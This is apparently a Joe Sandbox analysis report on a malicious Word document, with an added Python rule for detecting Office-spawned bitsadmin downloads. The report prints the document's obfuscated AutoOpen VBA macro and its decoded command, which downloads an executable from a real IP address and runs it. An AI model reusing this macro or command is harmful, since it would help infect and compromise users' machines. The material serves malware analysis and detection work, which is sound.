Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 17.0.0 |
Analysis ID: | 204881 |
Start time: | 17:34:12 |
Joe Sandbox Product: | Cloud |
Start date: | 12.01.2017 |
Overall analysis duration: | 0h 5m 29s |
Report type: | full |
Sample file name: | 2e374756930bee59c371d98ff88572a8.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 (Office 2013 v14, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36) |
Number of new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies |
Detection: | MAL |
Classification: | mal64.evad.expl.winDOC@7/12@0/0 |
HCA Information: |
EGA Information: | Failed |
Cookbook Comments: |
Warnings: |
Detection |
---|
Strategy | Score | Range | Reporting | Detection |
---|---|---|---|---|
Threshold | 64 | 0 - 100 | Report FP / FN | |
Confidence |
---|
Strategy | Score | Range | Further Analysis Required? | Confidence |
---|---|---|---|---|
Threshold | 5 | 0 - 5 | false | |
Classification |
---|
Analysis Advice |
---|
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook |
Signature Overview |
---|
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Networking: |
---|
URLs found in memory or binary data |
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: MSOSQM.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: bitsadmin.exe | String found in binary or memory: | ||
Source: cmd.exe | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: 2e374756930bee59c371d98ff88572a8.doc | String found in binary or memory: | ||
Source: WINWORD.EXE, 2e374756930bee59c371d98ff88572a8.doc | String found in binary or memory: |
Downloads files |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Found strings which match known social media URLs |
Source: WINWORD.EXE | String found in binary or memory: |
Persistence and Installation Behavior: |
---|
May use bcdedit to modify the Windows boot settings |
Source: cmd.exe | Binary or memory string: |
Tries to download files via bitsadmin |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
Data Obfuscation: |
---|
Document contains an embedded VBA with many randomly named variables |
Source: 2e374756930bee59c371d98ff88572a8.doc | Stream path 'Macros/VBA/NewMacros' : |
System Summary: |
---|
Checks whether correct version of .NET is installed |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Found graphical window changes (likely an installer) |
Source: Window Recorder | Window detected: |
Checks if Microsoft Office is installed |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File opened: |
Classification label |
Source: classification engine | Classification label: |
Creates files inside the user directory |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Creates temporary files |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Document contains an OLE Word Document stream indicating a Microsoft Word file |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE indicator, Word Document stream: |
Document contains summary information with irregular field values |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE document summary: |
Found command line output |
Source: C:\Windows\System32\cmd.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: |
Reads ini files |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File read: |
Reads software policies |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Spawns processes |
Source: unknown | Process created: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
Uses an in-process (OLE) Automation server |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Document contains embedded VBA macros |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE indicator, VBA macros: |
Reads the hosts file |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File read: |
Document contains an embedded VBA macro which executes code when the document is opened / closed |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE, VBA macro line: |
Source: VBA code instrumentation | OLE, VBA macro: | Name: AutoOpen |
Document contains an embedded VBA macro which may execute processes |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE, VBA macro line: |
Source: VBA code instrumentation | OLE, VBA macro: | Name: AutoOpen |
Document contains an embedded VBA macro with suspicious strings |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE, VBA macro line: |
Source: VBA code instrumentation | OLE, VBA macro: | Name: MJCTM |
Anti Debugging: |
---|
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) |
Source: C:\Windows\System32\bitsadmin.exe | System information queried: |
Malware Analysis System Evasion: |
---|
Checks the free space of hard drives |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File Volume queried: | ||
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE | File Volume queried: |
May sleep (evasive loops) to hinder dynamic analysis |
Source: C:\Windows\System32\bitsadmin.exe TID: 3684 | Thread sleep time: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messages (SetErrorMode) |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process information set: | ||
Source: C:\Windows\System32\cmd.exe | Process information set: | ||
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE | Process information set: |
Document contains OLE streams with high entropy indicating encrypted embedded content |
Source: 2e374756930bee59c371d98ff88572a8.doc | Stream path 'Data' entropy: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Queries the volume information (name, serial number, etc.) of a device |
Source: C:\Windows\System32\cmd.exe | Queries volume information: |
Queries time zone information |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Behavior Graph |
---|
Yara Overview |
---|
No Yara matches |
---|
Screenshot |
---|
Startup |
---|
Created / dropped Files |
---|
File Path | Type and Hashes |
---|---|
Contacted Domains/Contacted IPs |
---|
Static File Info |
---|
General | |
---|---|
File type: | 0 |
TrID: |
File name: | 2e374756930bee59c371d98ff88572a8.doc |
File size: | 119808 |
MD5: | 2e374756930bee59c371d98ff88572a8 |
SHA1: | c5f3fd7570bd32edc44795a92c59965b4d9bbc08 |
SHA256: | 115c18d207694542dad0e876a36f1a64447a45fa2f78a0254f75799122810922 |
SHA512: | 7a2eb7d8d8fc9be26fcf3f4e95ffc794f371e1f7984c64536469f51c4d1f27c1a9734254cfd0942fcf86209a03152a4b2d05802a17be5b23cfcf4a239d099fa9 |
File Icon |
---|
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "2e374756930bee59c371d98ff88572a8.doc" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Title: | |
Subject: | |
Author: | admin |
Keywords: | |
Comments: | |
Template: | Normal.dot |
Last Saved By: | dood |
Revision Number: | 31 |
Total Edit Time: | 4860 |
Create Time: | 2016-08-03 20:27:00 |
Last Saved Time: | 2016-09-21 11:55:00 |
Number of Pages: | 1 |
Number of Words: | 102 |
Number of Characters: | 586 |
Creating Application: | Microsoft Office Word |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Number of Lines: | 4 |
Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | False |
Company: | NhT |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 730895 |
Streams with VBA |
---|
VBA File Name: NewMacros.bas, Stream Size: 8792 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/NewMacros |
VBA File Name: | NewMacros.bas |
Stream Size: | 8792 |
VBA Code with Deobfuscations |
---|
VBA Code |
---|
VBA File Name: ThisDocument.cls, Stream Size: 924 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 924 |
VBA Code with Deobfuscations |
---|
VBA Code |
---|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 113 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 113 |
Entropy: | 4.34494072836 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . M i c r o s o f t O f f i c e W o r d . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . . |
Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | FoxPro FPT, blocks size 512, next free block index 4278124544 |
Stream Size: | 4096 |
Entropy: | 0.508296801708 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . D . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N h T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | FoxPro FPT, blocks size 512, next free block index 4278124544 |
Stream Size: | 4096 |
Entropy: | 0.464316040624 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a d m i n . . . . . . . . . . . . . . . . . . . |
Stream Path: 1Table, File Type: FoxPro FPT, blocks size 256, next free block index 2248282368, Stream Size: 7198 |
---|
General | |
---|---|
Stream Path: | 1Table |
File Type: | FoxPro FPT, blocks size 256, next free block index 2248282368 |
Stream Size: | 7198 |
Entropy: | 3.07205149777 |
Base64 Encoded: | False |
Stream Path: Data, File Type: data, Stream Size: 74220 |
---|
General | |
---|---|
Stream Path: | Data |
File Type: | data |
Stream Size: | 74220 |
Entropy: | 7.9301420367 |
Base64 Encoded: | True |
Data ASCII: | . . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . C . . . : . . . . A . . . . . . " . . . . . . . . . . . . . . . m . i . c . r . o . s . o . f . t . _ . o . f . f . i . c . e . . . . . . . . . . . . . . . b . . . m . . . . . R . o x = . . . j B 4 . . . s . . . I . . . . . . . D . . . . . D . . n . . A . . . R . o x = . . . j B 4 . . . s . . . P N G . . . . . . . . I H D R . |
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 485 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 485 |
Entropy: | 5.23409240996 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . H e l p F i l e = " " . . N a m e = " s d g s d g s d g e r g h e g e " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 0 9 2 3 C 3 A 4 0 3 A 4 0 3 E 4 4 3 E 4 4 " . . D P B = " 2 0 2 2 8 C D 3 A 9 D 3 A 9 2 C 5 7 D 4 A 9 1 6 8 F C 1 0 5 0 4 5 A |
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECTwm |
File Type: | data |
Stream Size: | 71 |
Entropy: | 3.34859995248 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . . |
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4210 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4210 |
Entropy: | 4.90815306169 |
Base64 Encoded: | False |
Data ASCII: | . a y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . |
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 588 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 588 |
Entropy: | 6.2869378548 |
Base64 Encoded: | True |
Data ASCII: | . H . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . s d g . . e r g h . e g e . . L . . @ . . . . . . = . . . . ~ . . . . . . . . . . . . Y ( . . . . J < . . . . . . 9 s t d o l e > . . . s . t . d . o . . l . e . . . h . . % ^ . . * \\ G { 0 . 0 0 2 0 4 3 0 - ; . . . . C . . . . . . 0 0 . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ S y s @ W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t 8 i o n . 0 . . . E N o P r m a l . E N . C r . . m . a . F . . . . . . . . * \\ C . . . . |
Stream Path: WordDocument, File Type: data, Stream Size: 8248 |
---|
General | |
---|---|
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 8248 |
Entropy: | 3.72353646171 |
Base64 Encoded: | True |
Data ASCII: | . . . . # ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j m . m . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . ^ . . . ^ . . . . . . . ^ . . . . . . . ^ . . . . . . . ^ . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . |
Data Raw: | ec a5 c1 00 23 60 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 06 00 00 b0 0b 00 00 0e 00 62 6a 62 6a 6d a5 6d a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 38 20 00 00 0f cf 00 00 0f cf 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 17:34:20 |
Start date: | 12/01/2017 |
Path: | C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | unknown |
Imagebase: | 0xcb0000 |
File size: | 1923232 bytes |
MD5 hash: | FEC5FFC0B51C78D9376A74CD2855D479 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 17:34:25 |
Start date: | 12/01/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit |
Imagebase: | 0x771a0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 17:34:26 |
Start date: | 12/01/2017 |
Path: | C:\Windows\System32\bitsadmin.exe |
Wow64 process (32bit): | false |
Commandline: | bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe C:\Users\SOFWIL~1\AppData\Local\Temp\~.exe |
Imagebase: | 0x755a0000 |
File size: | 186368 bytes |
MD5 hash: | 0920B14AA67A8B04ACF48FFE7C6F0927 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 17:36:26 |
Start date: | 12/01/2017 |
Path: | C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE |
Wow64 process (32bit): | false |
Commandline: | C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE |
Imagebase: | 0x1240000 |
File size: | 550576 bytes |
MD5 hash: | 04D5CDDFC37410CF388AD731E655E277 |
Programmed in: | C, C++ or other language |
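The process chain recorded above (WINWORD.EXE starts cmd.exe, which starts bitsadmin.exe with a /transfer job pointing at an http URL) is the signal a detection engineer would key on, since bitsadmin is a signed system binary and the download itself looks like ordinary BITS traffic. The following is an added example, not part of the Joe Sandbox report and not the sample's code: it walks process ancestry and alerts only when a bitsadmin download is descended from an Office application. The events are constructed; PIDs are invented except that cmd.exe is given 1964, the task ID the report shows Shell() returning, while image paths and command lines are copied from the report. MSOSQM.EXE is Office's own Software Quality Metrics uploader and is included only as a non-alerting Office child; its parent process is assumed, the report does not state it. A second, benign bitsadmin transfer launched from an interactive shell is constructed to show that the rule does not fire on bitsadmin alone.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Constructed process events modelled on the System Behavior section above.
# PIDs are invented (1964 for cmd.exe is the value Shell() returned in the
# report); paths and command lines are copied from the report.
EVENTS = [
    Proc(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(1100, 1000, r"C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE",
         "WINWORD.EXE"),
    Proc(1964, 1100, r"C:\Windows\System32\cmd.exe",
         r"cmd /C bitsadmin /transfer dw /download /priority high "
         r"http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit"),
    Proc(1980, 1964, r"C:\Windows\System32\bitsadmin.exe",
         r"bitsadmin /transfer dw /download /priority high "
         r"http://93.170.104.98/jbmfkjfre.exe C:\Users\SOFWIL~1\AppData\Local\Temp\~.exe"),
    # Office telemetry process; parent assumed to be WINWORD for this example.
    Proc(2100, 1100, r"C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86"
                     r"\Microsoft Shared\OFFICE15\MSOSQM.EXE", "MSOSQM.EXE"),
    # Constructed benign case: an administrator's interactive shell running a transfer.
    Proc(3000, 1000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    Proc(3010, 3000, r"C:\Windows\System32\bitsadmin.exe",
         r"bitsadmin /transfer patch /download http://updates.example.invalid/fix.msu C:\patches\fix.msu"),
]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# bitsadmin ... /transfer ... http(s):// in one command line.
BITS_DOWNLOAD = re.compile(r"bitsadmin(?:\.exe)?\b.*\s/transfer\b.*\bhttps?://", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(proc, by_pid):
    """Parent chain of proc, nearest first; stops at an unknown or already seen pid."""
    chain, seen, cur = [], set(), proc
    while cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain


def office_spawned_downloader(events, max_depth=3):
    """Alert on bitsadmin transfers from a URL whose ancestry, within max_depth
    hops, contains an Office application. Returns one dict per hit."""
    by_pid = {p.pid: p for p in events}
    alerts = []
    for p in events:
        if basename(p.image) != "bitsadmin.exe" or not BITS_DOWNLOAD.search(p.cmdline):
            continue
        chain = ancestors(p, by_pid)[:max_depth]
        office = next((a for a in chain if basename(a.image) in OFFICE_IMAGES), None)
        if office is None:
            continue
        upto = chain[: chain.index(office) + 1]
        alerts.append({
            "pid": p.pid,
            "office_parent": basename(office.image),
            "chain": [basename(a.image) for a in reversed(upto)] + [basename(p.image)],
            "cmdline": p.cmdline,
        })
    return alerts


if __name__ == "__main__":
    for alert in office_spawned_downloader(EVENTS):
        print(" -> ".join(alert["chain"]), "|", alert["cmdline"])
```

The depth limit matters: with `max_depth=1` the rule would look only at bitsadmin's direct parent (cmd.exe) and miss this sample, which is exactly the hop the macro introduces by going through `cmd /C`. Three hops covers the common Office, shell, LOLBin layering without reaching back to explorer.exe.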
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Module: NewMacros |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "NewMacros" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Array | |
Array | |
Array | |
Array | |
Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Replace | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: CreateObject | |
Part of subcall function MJCTM@NewMacros: Date | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Pattern | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Date | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Global | |
Part of subcall function MJCTM@NewMacros: Replace | |
Array | |
Date | |
Shell | Shell("cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit",0) -> 1964 |
Array | |
Array |
Strings | Decrypted Strings |
---|---|
"08fd" | |
"T" | |
"debasement" | |
"So4T9" | |
"cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9" | |
"ring" | |
"317eed7b" | |
"32500" | |
"""" |
Line | Instruction | Meta Information |
---|---|---|
89 | Sub AutoOpen() | |
90 | Dim GUEQgl0 as Currency | executed |
91 | GUEQgl0 = - 4067 | |
92 | Dim wcUbOm | |
93 | wcUbOm = Array() | Array |
94 | Dim gq5z4s | |
95 | gq5z4s = Array(44415.093361908, - 12425, True, "T", "08fd", True) | Array |
96 | oUJ1RH = 12730.522629119 | |
97 | Dim SYLDEIEHU as Long | |
98 | SYLDEIEHU = - 1851000800 | |
99 | Dim FtubqlSwF | |
100 | FtubqlSwF = 194 | |
101 | Const nfYJAbOe = True | |
102 | dXqA7m = Array(- 12581, "debasement", 5843.503110416, 51380, 28, 17137.457762019) | Array |
103 | Dim nUKaI61f as String | |
104 | Const EbPbjMfg = False | |
105 | Dim ETBwFjm | |
106 | ETBwFjm = Array() | Array |
107 | qHfrpSwZq = - 219635906 | |
108 | Dim uj0Cswp | |
109 | uj0Cswp = 9 | |
110 | Dim kyyXvysya as Variant | |
111 | kyyXvysya = Array() | Array |
112 | nUKaI61f = MJCTM("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9", "So4T9") | |
113 | AJnLTjdoe = Array(50590, 0, 253, 11638, "ring", False, - 2378) | Array |
114 | Dim jQsbW | |
115 | jQsbW = Date | Date |
116 | Dim J8pAjy as String | |
117 | J8pAjy = "317eed7b" | |
118 | zHgWO = - 2086329278 | |
119 | kpmVq = Empty | |
120 | BqXpmPanR = True | |
121 | hRpGYfaRr = - 426398108 | |
122 | Const IbHFT = "32500" | |
123 | G3h5PwT = - 13855 | |
124 | Shell nUKaI61f, 0 | Shell("cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit",0) -> 1964 executed |
125 | Hwpuwedp = Array(0, 20128, 54868.962024103, 45712.308802002, True, - 1868748710, "") | Array |
126 | ORSXIMyL = - 16892 | |
127 | Dim SGqXR | |
128 | SGqXR = 16032.845284238 | |
129 | Const OFXiY = 34986.350534212 | |
130 | Dim xQWF3VrvY as Variant | |
131 | xQWF3VrvY = Array() | Array |
132 | dVrztZa = 0 | |
133 | JBwM8 = 14580.854766339 | |
134 | End Sub |
APIs | Meta Information |
---|---|
Array | |
